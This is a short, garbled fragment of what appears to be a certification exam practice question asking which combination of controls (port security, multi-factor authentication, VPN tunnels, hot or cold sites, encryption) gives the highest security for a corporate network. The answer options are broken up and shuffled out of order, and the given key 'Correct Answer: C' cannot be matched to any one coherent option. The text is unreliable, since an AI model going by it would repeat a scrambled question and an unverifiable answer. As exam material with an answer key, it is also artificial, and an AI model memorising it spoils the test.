IPv6 networking. and a warm site. Port security on all switches. two-factor authentication. a cold site. port security. physical locks. and a cold site. three-factor authentication. cloud based servers. C. cloud based servers. physical security guards. a sign-in roster. point to point VPN tunnels for user connections to servers.QUESTION 245 Which of the following provides the HIGHEST level of security for an integrated network providing services to authenticated corporate users? A. D. Correct Answer: C Section: (none) Explanation Explanation/Reference: . and a standby hot site.factor cryptographic authentication. B. full disk encryption. Port security on switches. three-factor authentication. and IPv6 networking. two. Point to point VPN tunnels for external users. point to point VPN tunnels for user server connections.